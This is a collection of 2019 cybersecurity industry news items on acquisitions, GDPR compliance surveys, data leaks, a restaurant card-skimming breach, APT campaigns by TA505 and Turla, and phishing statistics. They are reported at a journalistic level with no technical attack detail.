J.J. Thompson, founder and CEO of Rook Security, says that the company is excited by the acquisition: "Together, we can implement faster and more effective threat detection and response capabilities to better protect businesses." 

According to a press release, Sophos is releasing no further details at this time.

Sophos has been splashing the cash in 2019 with the additional acquisition of Avid Secure earlier on in the year. The purchases were for MDR services and cloud infrastructure, bolstering the company's offering. 

Over Half of UK Firms Failing on Privacy Compliance

Over Half of UK Firms Failing on Privacy Compliance

UK firms are struggling with a complex patchwork of privacy regulations, with more than half now believing they’re failing with compliance efforts, according to new research from Thomson Reuters.

The news wire surveyed data privacy professionals at global organizations with an average of 16,000 employees before and after the GDPR came into force, to compile its latest report.

It found that UK businesses either have greater insight into their capabilities, or are genuinely falling behind their global counterparts when it comes to compliance.

Some 57% said they believe their business is failing to meet global compliance requirements, up from 44% in 2017. This compares with a global average of 48%, which falls further to 42% for US firms and just 31% in France.

UK companies are spending on average £840,000 annually to comply with global regulations, including the GDPR.

The new powers granted to regulators of monetary fines up to €20m or 4% of global annual turnover will be at the forefront of directors’ minds, according to Jim Leason, customer proposition lead for Legal Professionals Europe at Thomson Reuters.

“Many businesses are getting less comfortable over their GDPR compliance. More businesses now than a year ago believe they are failing to comply with all of their global data privacy-related obligations. Obviously, the comfort level businesses have with compliance is heading in the wrong direction,” he argued.

“What also seems to be coming through from our research is a sense that businesses feel legislators and regulators didn’t anticipate the major workload that GDPR entails.”

UK regulator the Information Commissioner’s Office (ICO) said it has received over 14,000 breach reports since the GDPR came into force, four-times more than the previous 12-month period.

Although it has consistently argued that GDPR compliance is an ongoing journey, and that it prefers to educate rather than penalize, major fines could be announced soon as the result of several investigations are published.

Confusion Reigns as C-Suite Bemoans Lack of Security Resources

Confusion Reigns as C-Suite Bemoans Lack of Security Resources

Most C-level executives believe their organization is more exposed to potential security breaches because it lacks crucial technical, financial or human resources, according to new research from Nominet.

The .uk registry, which also offers DNS security services, polled 400 C-level executives in the UK and US to reveal boardroom attitudes to security risk.

Although most (76%) now understand that a breach is inevitable, 90% believe they’re missing something that would help mitigate cyber threats. These include advanced technology (59%), lack of budget (44%) and lack of staff (41%).

Another challenge highlighted by respondents was senior management reluctant to accept advice (46%).

In fact, knowledge and responsibility gaps at the top could be severely hampering organizations’ ability to respond to such threats. There’s confusion over who is responsible for breach response, with over a third of respondents (35%) claiming it’s the CEO, while 32% pointed to the CISO. The vast majority of respondents (71%) also admitted to having gaps in their knowledge, especially about malware (78%).

There’s also confusion over breach reporting. Although 70% said incidents are initially reported to the security team, 61% do so to the executive team and 40% to the board. A third of CEOs even claim they would fire any employee responsible for a breach, despite the admission that such incidents are inevitable.

Only half of CISOs feel valued by the board in terms of brand and revenue protection, with 18% believing the board thinks they’re an inconvenience. However, over half (52%) of directors said their CISO is a “must have.”

This confusion could be responsible for the moderate to high stress levels that most (91%) CISOs experience, damaging the mental health of over a quarter (27%), according to separate findings from the same research released by Nominet in February.

“This research is very much a case of ‘the good, the bad, and the ugly.’ It’s good to see that business leaders are aligned on the fact that cyber-attacks are pretty much an inevitable part of working life. Acceptance is the first step to protection. There’s also a dedication to keeping customer and client data safe,” argued Nominet CEO, Russell Haworth.

“But the bad comes with the power struggle at the top, with confusion over who should actually take responsibility in case of a data breach or cyber-attack, which is detrimental to the safety and security of the business. And the ugly is how CISOs feel within their organization.”

IEEE Lifts Restriction on Huawei Employees

IEEE Lifts Restriction on Huawei Employees

The Institute of Electrical and Electronics Engineers (IEEE) has lifted a restriction on Huawei, meaning the firm’s employees can participate once again in reviewing and editing research papers.

The international technical organization had instituted the ban after the US Department of Commerce placed the Chinese giant and its affiliates on an Entity List.

This led to a furious response from the Middle Kingdom, where the China Computer Federation (CCF) said it would suspend all its interactions with the IEEE.

However, after seeking clarification from Washington, the crisis appears to have been averted, for now.

“Our initial, more restrictive approach was motivated solely by our desire to protect our volunteers and our members from legal risk. With the clarification received, this risk has been addressed,” the IEEE said in a statement.

“We appreciate the many questions and comments from our members and volunteers around the world and thank them for their patience as we worked through a legally complex situation. IEEE recognizes that science and technology are a global activity. We are proud of the work our members do around the world and we are dedicated to advancing technological excellence for the benefit of humanity.”

However, it’s not clear whether the lifting of the restriction will only last the duration of the 90-day temporary license recently issued to Huawei, which will allow US firms to continue to sell to the telecoms giant.

Widely reported as a climb down by Washington, the 90-day license could be viewed more accurately as a provision to given US firms more buffer time to adjust to the shock of losing one of their biggest tech clients.

The shutting out of Huawei employees from international associations like IEEE is a portent of things to come if the world’s two superpowers can’t find a way around the current stand-off.

Chinese Dating Apps Leak US User Data

Chinese Dating Apps Leak US User Data

An unsecured Elastic database associated with dating apps has been discovered by a security researcher, making easily identifiable data exposed. Jeremiah Fowler, who has been working in the security software industry for over 10 years, found the database that held information about US data app customers, including their sexual preferences, lifestyle choices, and whether they were unfaithful to their partners. Fowler wrote on Security Discovery, "it is easy for anyone to identify a large number of users with relative accuracy based on their 'User ID.'"

According to Fowler, the IP address for the database was located on a US server and with the majority of users appearing to be Americans. He found that even though the data was hosted by "multiple dating applications," upon further investigation he found them to be developed by separate companies or individuals. 

He was able to identify the users' real identities online, as the dating applications logged and stored the user’s IP address, age, location, and user names. "Like most people, your online persona or user name is usually well crafted over time and serves as a unique cyber fingerprint," wrote Fowler. 

He attempted to contact the email addresses associated with the applications and identify the address and phone number using the Whois domain registration. "The address that was listed there was Line 1, Lanzhou and when trying to validate the address I discovered that Line 1 is a Metro station and is a subway line in Lanzhou," he explained on his blog. "The phone number is basically all 9’s and when I called there was a message that the phone was powered off.

"I am not saying or implying that these applications or the developers behind them have any nefarious intent or functions, but any developer that goes to such lengths to hide their identity or contact details raises my suspicions. Call me old fashioned, but I remain skeptical of apps that are registered from a metro station in China or anywhere else."

Terry Ray, senior vice president and Imperva Fellow, told Infosecurity that he agrees with Fowler's sentiments: "There are several strange things about this leaky database, especially the fact that the applications appear to target English speakers yet have, at least in one app, a business location in China, as having all owner or admin contact falsified or unavailable. It makes you wonder who is storing this data from these particular dating apps and what the underlying purpose is.

"Furthermore, why are multiple dating apps storing their data in the same place, yet little or no connection between the apps, their product names or their business contacts?"

At the time of writing his blog, Fowler disclosed that the database was still "publicly accessible" and despite a large number of users, there was no personally identifiable information. He had not received responses to his emails. "What concerns me most is that the virtually anonymous app developers could have full access to user’s phones, data, and other potentially sensitive information," he wrote. "It is up to users to educate themselves about sharing their data and understand who they are giving that data to. This is another wake-up call for anyone who shares their private information in exchange for some kind of service."

According to Verizon, 22% of data breaches in 2017 involved the use of stolen credentials, with 36% of compromised data being personal information such as name, birthday and gender.

"Although the article notes that this database wasn’t storing personally identifiable information, the writer was, in fact, able to ‘identify’ some of the ‘persons’ with the credentials found, this highlights the importance that if you are storing user data, you are responsible for ensuring that data is protected," Ray told Infosecurity. "Further, if you’re an app user and want to remain anonymous, make sure you use different usernames and passwords as much as possible."

Checkers and Rally’s Victims of Data Breach

Checkers and Rally's Victims of Data Breach

On Wednesday, Checkers Drive-In Restaurants alerted customers that it had been dealing with a data security issue involving "malware at certain locations."

On its website, the restaurant group announced that after discovering the issue, it "engaged leading data security experts to conduct an extensive investigation." Federal law enforcement authorities have also been informed in order to address the matter, with all parties working to contain and remove the malware.

"After becoming aware of a potential issue, we retained data security experts to understand its nature and scope," Checkers wrote on its website. "Based on the investigation, we determined that malware was installed on certain point-of-sale systems at some Checkers and Rally’s locations, which appears to have enabled an unauthorized party to obtain the payment card data of some guests." According to the website, not all locations were affected by this issue.

The malware was reportedly designed to "collect information stored on the magnetic stripe of payment cards." This included cardholder name, payment card number, card verification code and expiration date. Checkers has launched an investigation and is working with payment card companies to protect cardholders. 

The restaurant group has recommended that card users "remain vigilant" and review account statements. "If you believe there is an unauthorized charge on your card, please contact your financial institution or card issuer immediately," the website states. 

Other recommendations include ordering a credit report: "When you receive your credit report, review it carefully," the website continues. "Look for accounts you did not open, for names of creditors from whom you haven’t requested credit." 

The law firm of Federman & Sherwood has initiated an investigation into the data breach.

TA505 Suspected in Chilean Financial Institutions Malware Attacks

TA505 Suspected in Chilean Financial Institutions Malware Attacks

Investigators from CyberInt Research have identified further activities by the suspected Russian-speaking cyber-gang TA505, targeting financial institutions in Chile. The cyber-gang is continuing its "unauthorized and nefarious use of the same TTPs of legit software, this time leveraging MSI Installer to deploy the AMADAY malware family," according to the company.

The AMADAY implant allows cyber-criminals to steal financial institutions’ and retailers’ clients’ email correspondence and sensitive information. This further enables them to steal contact lists, allowing them to target additional organizations by sending seemingly legitimate malicious emails that appear to come from trusted sources.

TA505 has been active since 2014, with high-volume malicious email campaigns distributing the Dridex and Shifu banking Trojans, as well as the Neutrino botnet/exploit kit and Locky ransomware. They appeared again as the source for recent attacks against the global financial and retail industry from December 2018 to present, with attacks worldwide, including India, Italy, Malawi, Pakistan, South Korea and the United States.

“TA505 is highly motivated, very clever, and persistent,” says Adi Peretz, head of research at CyberInt. “It’s critical to monitor their activities to anticipate further attacks. Once the pattern of attacks in Chile was identified, other financial institutions can beef up their security, so they don’t end up being breached."

“Social engineering works because it recruits the weakest link in any cybersecurity operation – we humans,” continues Peretz. “The more prepared companies are, the better they can train their people to maintain security.”

In April 2019, Infosecurity Magazine reported that TA505 was using a TektonIT remote administration tool to target financial and retail institutions. CyberInt found that the tool was "virtually undetectable" by threat protection systems due to it being "legitimate software." 

"Tried and tested attack patterns appear to be consistent across these recently observed campaigns and commence with the delivery of phishing emails that have lure document attachments," according to a CyberInt report. "Utilising legitimate logos, language and terminology consistent with common business interactions or the target organization, the email encourages the potential victim to open the lure document attachment which in turn instructs them to disable security controls within Microsoft Office to allow a nefarious macro to be executed."

Cybersecurity Jobs Added to Government’s Shortage Occupation List

Cybersecurity Jobs Added to Government's Shortage Occupation List

Cybersecurity engineers and analysts have been identified as being on the Shortage Occupation List (SOL), in the first full review of officially recognized careers where the shortages “are most severe and where the consequences of those shortages are most serious” since February 2013.

According to the UK Government’s Migration Advisory Committee (MAC), “job shortages in roles such as cybersecurity analysts/engineers and IT network engineers” are now recognized, while the “occupation as a whole ranked highly in our shortage indicators and had an above average vacancy rate.”

In the previous partial update, published in 2015, the job “cybersecurity specialist” was added under the section “information technology and communications professionals not elsewhere classified.” Then, the shortage related to “a person with a minimum of five years’ relevant experience and demonstrable experience of having led a team.”

Since the 2015 partial update, while the need for more skilled cybersecurity professionals remains in this list, it now states “there will be no minimum experience requirement as applying an experience caveat could hinder the development of cybersecurity at all levels.”

This change in requirement follows criticism of hiring practices, where five to 10 years experience is common and cited as a deterrent to new applicants.

In an email to Infosecurity, Ed Williams, director EMEA of SpiderLabs at Trustwave, said: “The security industry is to blame to some degree, there is very much a gatekeeper philosophy, which is starting to be broken down, but not nearly quick enough from my perspective. This industry is so fast paced and exciting, we should be pulling in the brightest and best - these don’t have to come from Computer Science backgrounds.”

The MAC stated the impact of the skills shortage on cybersecurity development, saying that there have been reported delays to “software improvements and features as they do not have the labor or expertise to fulfil demand” and this has led to “an increasing reliance on workers from outside the UK and there is a growing concern surrounding the future skills base for roles within new technical areas.”

The MAC cited “several sources amongst Government and the private sector” who agreed that there is a shortage of digital skills within the UK, evidenced by consistent vacancies in digital occupations, growth in demand for digital skills as well as documented deficiencies across the population in terms of digital skill. However, the MAC acknowledged that “there is not enough domestic supply of sufficiently skilled labor to fill this demand.”

According to Deloitte’s Digital Disruption Index for 2019, only 18% of respondents believe that UK school leavers and graduates have the right digital skills, while only 25% of digital leaders in the UK believe their workforce has sufficient knowledge and expertise to execute their digital strategy.

In the section 'Digital and IT Occupations,' careers as IT specialist managers, IT project and programme managers, IT business analysts, architects and systems designers, programmers and software development professionals, web design and development professionals and information technology and telecommunications professionals were listed as being in shortage. Cybersecurity careers appeared under section SOC 2139 - information technology and telecommunications professionals. 

The MAC said that “short-term mitigations have helped to fill shortages to some extent, but this has had limited impact as the skills required simply are not available.”

As well as short-term mitigations, the MAC said that long-term strategies also have their limitations; as up-skilling staff “is constrained by the lack of expertise in newer areas such as cybersecurity and secondly, these strategies are yet to mature, and so the scale of their impacts cannot truly be assessed until the future.”

As part of the UK’s Digital Strategy, it stated that “there will be even greater demand for people with specialist digital skills” as the digital economy grows. 

“As we leave the European Union, it will be even more important to ensure that we continue to develop our home-grown talent, up-skill our workforce and develop the specialist digital skills needed to maintain our world leading digital sector,” then Secretary of State for Culture, Media and Sport Karen Bradley MP stated.

She acknowledged then that “a strong pipeline of specialist skills - from coding to cyber” was needed, and initiatives like the NCSC’s Cyberfirst have enabled that. However, a more immediate solution is needed until the next generation begin work.

To be placed on the SOL, a job must meet three requirements:

  • Skilled (are the jobs skilled to the required level?)
  • Shortage (is the job in shortage?)
  • Sensible (is it sensible to try to fill those shortages through migration?)

According to the Migration Advisory Committee, being on the SOL conveys certain advantages:

  • Not having to conduct a Resident Labour Market Test (RLMT)
  • Exemption from the £35,000 minimum income threshold for settlement
  • Priority in the event that the cap binds

In the last Cybersecurity Workforce Study from (ISC)2, it claimed that there is a 2.9 million workforce “gap,” with the APAC region suffering the biggest shortfall of 2.14 million, followed by North America (498,000), EMEA (142,000) and Latin America (136,000).

Drone Use on the Rise, Public Safety at Risk

Drone Use on the Rise, Public Safety at Risk

Cybersecurity research firm IOActive has issued a stark warning about the potential, unseen risks surrounding the commercialization of drones – calling for manufacturers to take action.

In July 2018, analysts at Technavio predicted that the commercial drone market would grow by 36% (generating $11.61bn) between 2018 and 2022, but with that growth, IOActive has raised concerns about a range of new risks that could follow.

IOActive claimed that if the commercial market for drones is left unchecked, then we could start to see drones being weaponized, presenting potential hazards and threatening the safety of the public.

As drones become more commercially accessible and their functionality improves, they will also become more affordable, but what so often fails to keep pace when new tech such as this grows in popularity are in-built security features that keep it safe from malicious interference.

IOActive pointed to some key drone security risks that could arise as a result, including how malicious actors could program drones to fly to specific GPS coordinates to launch cyber-attacks on Wi-Fi networks (or other types of wireless networks), or even perform man-in-the-middle attacks and disseminate malware.

What’s more, there is also the real risk of disruption – seen recently in the chaos caused by drone sightings at Gatwick airport – and injury, with the potential for hacked drones to be used to ‘dive-bomb’ pedestrians or impact traffic intersections, IOActive explained. Then there’s the privacy issues, IOActive added, highlighting that drones have the capability to take photos and record audio and video in otherwise impossible to reach areas.

“With enough determination anything can be hacked, but the commercialization of the drone market is making it all too easy – and many of the consequences for security, safety and privacy have simply not been thought through,” said Cesar Cerrudo, CTO at IOActive.

“The range of drones is of particular concern as it opens up new areas of vulnerability that many will not have considered.”

Cerrudo urged manufacturers to shoulder their share of the responsibility for the products they are bringing to market to ensure they are as secure as possible.

“The relative speed at which these devices are taking to the sky raises several issues. While the use of drones within the military has been common for many years, those drones have been rigorously tested and built with security in mind – commercial manufacturers do not have the same concerns, they are more focused on getting their product to market than ensuring cybersecurity. This attitude needs to change.”

UK Universities Facing Daily State-Sponsored Attacks

UK Universities Facing Daily State-Sponsored Attacks

UK universities are facing increased attacks from state-sponsored hackers, who are targeting their research programs.

According to a survey of 75 senior IT leaders across 68 UK universities by VMware and Dell EMC, a quarter of respondents said their institution is targeted on a daily basis, while one in 10 strongly agreed that a successful attack on their research could have a harmful impact on the lives of UK citizens.

The research also found that 24% of UK universities believed their security and defense research may have already been infiltrated, while over half (53%) said a cyber-attack on their institution has led to research ending up in foreign hands.

John Chapman, CISO, UK Public Sector at Dell EMC, said: “In conducting research that may shape the future of the nation and its citizens, universities are under the microscope of some of the world’s most well-resourced and potent cyber-attackers. We hope this study will encourage them to look critically at their cybersecurity readiness. Universities must do more to protect themselves, and the sensitive information they hold, against the ever-expanding range of increasingly sophisticated threats.”

Specifically, cyber-criminals target scientific (54%), medical (50%), economic (37%) and defense research (33%). The research also found that 49% of university IT leaders recognize that a lack of IT investment is one of the forces driving the need for more robust cybersecurity practices.

In a statement sent to Infosecurity, Universities UK said: "Data security is an absolute priority for higher education providers and students alike. Universities UK is working with university leaders and the National Cyber Security Centre to help improve and strengthen security practices to better protect the sector from cyber threats. This includes the development of robust guidance on cybersecurity which we will release later this year.”

Insight Venture Partners to Acquire Recorded Future

Insight Venture Partners to Acquire Recorded Future

Insight Venture Partners has agreed to acquire a controlling interest in Recorded Future, a threat intelligence company, in addition to the minority stake it already owns. The all-cash transaction puts the value of Recorded Future at more than $780 million. 

According to its press release, Recorded Future is the largest privately held threat intelligence software company in the world, with more than 400 clients. Its solution is powered by its patented machine learning, alerting companies to unknown threats before they affect the business, helping teams respond to alerts 10 times faster. The solution pulls information from technical, open web and dark web sources and aggregates it with customer data. 

Insight Venture Partners is a leading global capital and private equity firm investing in high-growth technology and software companies. Founded in 1995, it has over $20 billion of assets under management and has cumulatively invested in over 300 companies worldwide.

According to Recorded Future's co-founder and CEO, Christopher Ahlberg, the investment will help the company "tap into the full potential of its technical roadmap" and solve some of "the most difficult and unique intelligence challenges" today.  

“My leadership team and I have had the privilege to work with Mike Triplett and the Insight team for a number of years, benefiting from their sage advice, industry knowledge and relationships," he commented. "This transaction is the logical next step for Recorded Future given the opportunities in front of us, as we fully realize the potential and vision of our strategy.”

Triplett, managing director at Insight, said: “Insight’s renewed investment is a testament to the vision and direction laid out by Recorded Future’s leadership team. They envision a world where everyone applies intelligence at speed and scale to reduce risk, remaining hyper-focused on providing clients with the threat intelligence necessary to understand their environments, manage risk, and combat malicious actors through contemporary awareness gained from the implementation of a threat intelligence-led security strategy." 

Pursuant to the terms of this investment, Triplett and Thomas Krane, VP at Insight, will join Recorded Future’s board of directors.

Recorded Future customers have included Bank of America, Nasdaq, Abbott and T-Mobile. 

Companies and Experts Call on GCHQ to Abandon “Ghost User” Proposal

Companies and Experts Call on GCHQ to Abandon "Ghost User" Proposal

Technology companies, trade associations, civil society organizations and 17 individual experts in digital security and policy have signed an open letter to the UK's Government Communications Headquarters (GCHQ), outlining concerns regarding a proposal by the intelligence center on allowing access to encrypted devices. The letter was shared with GCHQ on May 22, 2019, and made public on May 29, 2019.

GCHQ set forth its proposal for “silently adding a law enforcement participant to a group chat or call” in an Lawfare article in November 2018. This would "add a ghost user into encrypted chats" that would "require providers to suppress normal notifications to users." According to the letter, this would make users "unaware that a law enforcement participant had been added and could see the plain text of the encrypted conversation."

Written by Sharon Bradford Franklin and Andi Wilson Thompson, the letter to GCHQ explains how the ghost proposal would work, the ways in which technology companies would need to change their systems and the dangers that it would present. Specifically, the consortium outlined that if implemented, such access would “undermine the authentication process that enables users to verify that they are communicating with the right people, introduce potential unintentional vulnerabilities, and increase risks that communications systems could be abused or misused.” 

Jake Moore, security specialist at ESET, told Infosecurity that the proposal by GCHQ "makes a mockery of the fundamental basics of encryption."

"Not only is it going against what privacy is all about, but if you create a back door for the good guys, the bad guys won’t be far behind. Encryption is there for multiple reasons and shouldn’t be messed with. GCHQ has always had an issue with breaking serious encryption but to now demand access to private chats has far-reaching implications. 

"Cyber-criminals are not just using WhatsApp and, if a law one day passes to read this application, it will just push them to use another app – if they aren’t already. There are many apps which already promise ultimate privacy and are heavily used and relied upon.”

The open letter from the group asks GCHQ "to abandon the ghost proposal and any other approach that would pose similar risks to digital security and human rights." They also request an open dialogue with the intelligence organizations to address law enforcement access to encrypted chats and messages. 

This news comes after Germany proposed giving access to security authorities to apps such as WhatsApp and Telegram. 

93% of Companies Are Overconfident of Their Ability to Stop Data Breaches

93% of Companies Are Overconfident of Their Ability to Stop Data Breaches

Organizations are not equipping themselves against privileged access management (PAM) abuse, according to a report by Centrify and Techvangelism. Nearly 80% of organizations were found not to have a mature approach to combating PAM cyber-attacks, yet 93% of the organizations surveyed believe they were somewhat prepared for threats that involve privileged credentials. 

“This survey indicates that there is still a long way to go for most organizations to protect their critical infrastructure and data with mature privileged access management approaches based on zero trust,” says Tim Steinkopf, CEO of Centrify. “We know that 74% of data breaches involve privileged access abuse, so the overconfidence these organizations exhibit in their ability to stop them from happening is concerning."

The report found that companies do not take "the simplest" of measures, with 52% stating they do not use a password vault. In fact, out of the 1,300 organizations across 11 industry verticals in the U.S. and Canada, 43% were identified as having a "nonexistent" PAM approach. 

The survey also revealed that over half of companies surveyed have some questionable privileged access control; for example, 52% use shared accounts for controlling privileged access; 58% of organizations do not use multifactor authentication (MFA) for privileged administrative access to servers, and 51% of organizations do not control access to transformational technologies with privileged access, including modern attack surfaces, such as cloud workloads, big data projects and containers.

Looking at industry-specific trends, 39% of technology organizations have a nonexistent approach to PAM, as do healthcare (45%) and government (42%), which are both highly regulated and handle sensitive data. The financial sector scored highest in the "mature" category, followed by energy and utilities (26%). 

Cathy Hall, PAM practice lead at Sila Solutions Group, wrote about the best practice for PAM for Infosecurity Magazine in April 2019: "The best way to handle ... PAM ... isn’t to simply check a box to satisfy a mandate, it’s to view it as a mission. A mission-based approach ensures that you improve security across your whole enterprise over time, rather than only satisfying a limited, one-time mandate." 

Report: 50% Increase in Exposed Data in One Year

Report: 50% Increase in Exposed Data in One Year

New research released by digital risk protection specialists Digital Shadows has revealed a 50% increase in exposed data in the last year.

In its report Too Much Information: The Sequel from its Photon Research Team, Digital Shadows discovered that misconfiguration of commonly used file storage technologies was largely to blame for the exposure of 2.3 billion online files in one year. That is a jump of more than 750 million files since the same study was carried out by Digital Shadows in 2018.

Almost half of the files were exposed via the server message block protocol, whilst other technologies such as FTP services (20%), rsync (16%), Amazon S3 ‘buckets’ (8%) and network storage devices (3%) were also cited by Digital Shadows as sources of exposure.

Speaking to Infosecurity Harrison Van Riper, Photon Research analyst at Digital Shadows, said: “It is surprising to see such a large increase in such a short amount of time, indicating that the issue of inadvertent data exposure is not one to be taken lightly.”

However, it is not just the sheer amount of data exposed in the last 12 months or even the means by which it was that causes concern, as the sensitivity of the exposed data is also a significant issue. Digital Shadows warned that with exposed data including passport details, bank records, medical and business information, organizations and individual consumers are at greater risk of GDPR punishments, targeted business compromise, identity theft and ransomware attacks.

“Every day, there are new files being exposed that are potentially sensitive personal or private information for businesses and consumers alike,” Van Riper added. “Our research shows that in a GDPR world, the implications of inadvertently exposed data are even more significant. Countries within the European Union are collectively exposing over one billion files – nearly 50% of the total we looked at globally – some 262 million more than when we looked at last year. Some of the data exposure is inexcusable – Microsoft has not supported SMBv1 since 2014, yet many companies still use it. We urge all organizations to regularly audit the configuration of their public facing services.”

Fines Increase & Enforcements Fall in First Year of GDPR

Fines Increase & Enforcements Fall in First Year of GDPR

Data protection monetary penalties have increased by £2m in the past year, while the number of enforcements issued fell by more than 20 from the number issued in 2017.

According to PwC’s 2018 Privacy & Security Enforcement Tracker, monetary penalties issued to UK organizations for breaching data protection laws in the calendar year 2018 totaled more than £6.5m in 2018, over £2m more than the previous year.

The data also showed that while the total sum of fines has increased, the number of enforcements issued fell to 67 in 2018, from 91 in 2017.

After we marked a year since the deadline for GDPR compliance, the data also showed that private sector companies accounted for 86% of the enforcements, but scrutiny remains on the public sector given the sensitive nature of the data it handles. Also, a quarter (25%) of enforcement actions relate to personal data security breaches.

Stewart Room, lead partner for GDPR and data protection at PwC, said that the trend of enforcement remained constant in comparison with previous years, with marketing and security infringements dominating the regulatory agenda.

“The absence of any GDPR fines in 2018 was not surprising, as it takes many months for cases to work through the system, but we know that they are on their way,” he said. “As well as looking at how to improve their levels of legal compliance, I would encourage organizations to focus on how good approaches to the handling of personal data can help them to deliver on their business purpose, to help and sustain the creation of long term value and trust.”

In an email to Infosecurity, Emma Loveday-Hill, senior associate and data protection specialist at Prettys, said that as monetary penalty notices in the last year were issued under the old legislation (the Data Protection Act 1998), where the maximum fine was £500,000, there were still numerous high level fines issued due to the fact that there were a number of serious breaches.

“In terms of the reduction in enforcement notices, this is likely to be due to the fact that the ICO has been busy dealing with the backlog of complaints and issues brought to their attention since the introduction of the GDPR and DPA 2018,” she said.

“Investigations by their very nature take time to carry out, and given the likely number of the complaints and issues raised with the ICO, this has no doubt had an impact on how quickly enforcement notices are handed down.
“Our message is still very much ‘watch this space’ as the ICO are just getting started in terms of what they are doing under the GDPR and Data Protection Act 2018, and going forward we are likely to see a higher number of enforcement notices and fines coming through over the coming months as the ICO makes its goal for 2019 a clear one: breaches of data protection law will be taken seriously and financial penalties will be issued as a result of noncompliance.”

25% of Workers Would Give Away Data for £1000

25% of Workers Would Give Away Data for £1000

It's been a year since the implementation of GDPR, and it seems that businesses are as vulnerable as ever. According to a report by nCipher, 71% of the UK C-suite would be willing to cover up a data breach if they could escape the fines, compared with the 57% of managers and directors.

The survey found that while investment in employee training was second to investment in technology, IT leaders still find they lack support from the board and the wider C-suite. This is experienced within midsized companies (250–999 employees). 

Peter Galvin, chief strategy and marketing officer, nCipher Security, said, “Organizations are under a greater obligation than ever to disclose data breaches, particularly when personal information is at risk, but evidently many IT leaders – particularly at C-Level – still feel they can avoid being subject to fines and other punitive measures from regulatory bodies.”

However, it's not just the C-suite that is putting businesses at risk. According to a report by Deep Secure, almost half of office employees would be willing to sell corporate information to people outside their organization. In a company announcement, the company said that "£1,000 would be enough to tempt 25% of employees to give away company information." Shockingly, 5% would give it away for free.

The What Is the Price of Loyalty Report reveals how 10% of respondents would also sell intellectual property, such as product specifications, product code and patents, for £250 or less. The findings also revealed that one in five (19%) of respondents in graduate-level roles admitted that they were paid to source the information, with 29% of 16–24-year-olds reporting they had been approached by someone they didn’t know to take it.
Dan Turner, CEO of Deep Secure, commented, “The cost of employee loyalty is staggeringly low. With nearly half of all office workers admitting that they would sell their company's and clients’ most sensitive and valuable information, the business risk is not only undisputable but immense in the age of GDPR and where customers no longer tolerate data breaches. 
“Given the prevalent use of digital and cyber tactics to exfiltrate this information, it’s critical that businesses invest in a security posture that will help them both detect and prevent company information from leaving the network,” he said.

25% of Workers Would Give Away Data for £1,000

25% of Workers Would Give Away Data for £1,000

It's been a year since the implementation of GDPR, and it seems that businesses are as vulnerable as ever. According to a report by nCipher, 71% of the UK C-suite would be willing to cover up a data breach if they could escape the fines, compared with the 57% of managers and directors.

The survey found that while investment in employee training was second to investment in technology, IT leaders still find they lack support from the board and the wider C-suite. This is experienced within midsized companies (250–999 employees). 

Peter Galvin, chief strategy and marketing officer, nCipher Security, said, “Organizations are under a greater obligation than ever to disclose data breaches, particularly when personal information is at risk, but evidently many IT leaders – particularly at C-Level – still feel they can avoid being subject to fines and other punitive measures from regulatory bodies.”

However, it's not just the C-suite that is putting businesses at risk. According to a report by Deep Secure, almost half of office employees would be willing to sell corporate information to people outside their organization. In a company announcement, the company said that "£1,000 would be enough to tempt 25% of employees to give away company information." Shockingly, 5% would give it away for free.

The What Is the Price of Loyalty Report reveals how 10% of respondents would also sell intellectual property, such as product specifications, product code and patents, for £250 or less. The findings also revealed that one in five (19%) of respondents in graduate-level roles admitted that they were paid to source the information, with 29% of 16–24-year-olds reporting they had been approached by someone they didn’t know to take it.
Dan Turner, CEO of Deep Secure, commented, “The cost of employee loyalty is staggeringly low. With nearly half of all office workers admitting that they would sell their company's and clients’ most sensitive and valuable information, the business risk is not only undisputable but immense in the age of GDPR and where customers no longer tolerate data breaches. 
“Given the prevalent use of digital and cyber tactics to exfiltrate this information, it’s critical that businesses invest in a security posture that will help them both detect and prevent company information from leaving the network,” he said.

ESET Exposes Turla Malware Attacks on European Diplomats

ESET Exposes Turla Malware Attacks on European Diplomats

Turla, an infamous advanced persistent threat (APT) group, is using new PowerShell-based tools that provide direct, in-memory loading and execution of malware, executables and libraries. Researchers at ESET detected several attacks against diplomatic entities in Eastern Europe using PowerShell scripts, linking them to the group.

Turla is believed to have been operating since at least 2008 when it successfully breached the U.S. military. It has also been involved in major attacks against many government entities in Europe and the Middle East – among them the German Foreign Office and the French military. The group is also known as Snake or Uroburos. 

According to Malwarebytes Labs, Turla uses what is thought to be Russian governmental malware. It has infected Linux and Mac operating systems but is mostly associated with infecting Windows systems. 

The PowerShell-based tools can bypass detection techniques that are triggered when a malicious executable is dropped on a disk, which ESET researcher Matthieu Faou believes are being used globally against "other traditional Turla targets." 

The PowerShell loaders, detected by ESET under the umbrella name PowerShell/Turla, differ from simple droppers in their ability to persist on the system because they regularly load into memory only the embedded executables. In some samples, Turla developers modified their PowerShell scripts in order to bypass the Antimalware Scan Interface (AMSI). This technique leads to the antimalware product being unable to receive data from the AMSI interface for scanning.

“Along with Turla’s new PowerShell loader, we’ve discovered and analyzed several interesting payloads, including an RPC-based backdoor and a PowerShell backdoor leveraging Microsoft’s cloud storage service, OneDrive, as its command-and-control [C&C] server,” said Faou. “However, these techniques do not prevent the detection of the actual malicious payloads in memory."

One of the payloaders ESET has discovered is a whole set of backdoors relying on the RPC protocol, which are used to perform lateral movement and take control of other machines in the local network without relying on an external C&C server. 

“We believe this backdoor is a recovery access tool in case the main Turla backdoors are removed and operators can no longer access the compromised computers,” said Faou.

Impersonation Phishing Attacks Up 67% in Last 12 Months

Impersonation Phishing Attacks Up 67% in Last 12 Months

Mimecast has released its third annual State of Email Security Report and has found that phishing attacks have lost companies money, data and customers. Including insights from 1,025 global IT decision-makers, the report found that social engineering attacks were on the rise.

According to the study, phishing attacks were the most prominent type of cyber-attack, with 94% of respondents having experienced phishing and spear-phishing attacks in the previous 12 months. Over half (55%) cited seeing an increase in that same period.  

Most notably, the report found that impersonation attacks increased by over two-thirds (67%), with 73% of organizations impacted by impersonation attacks having experienced a direct loss. Specifically, 28% of businesses lost customers, 29% suffered financially and 40% lost data.

This surge has meant that people within organizations are losing confidence in their security. According to the report, 61% believe it is likely or inevitable their company will suffer a negative business impact from an email-borne attack this year. 

“Email security systems are the frontline defense for most of attacks. Yet just having and providing data on these attacks is not what creates value for most respondents,” says Josh Douglas, vice president of threat intelligence at Mimecast. “Survey results indicate that vendors need to be able to provide actionable intelligence out of the mass of data they collect and not just focus on indicators of compromise which would only address past problems."

According to the company's announcement on the findings, the top five industries being impacted by impersonation attacks are financial, manufacturing, professional services, science/technology and transportation. 

Other interesting statistics include: 

  • Ransomware attacks are up 26% in comparison to last year.
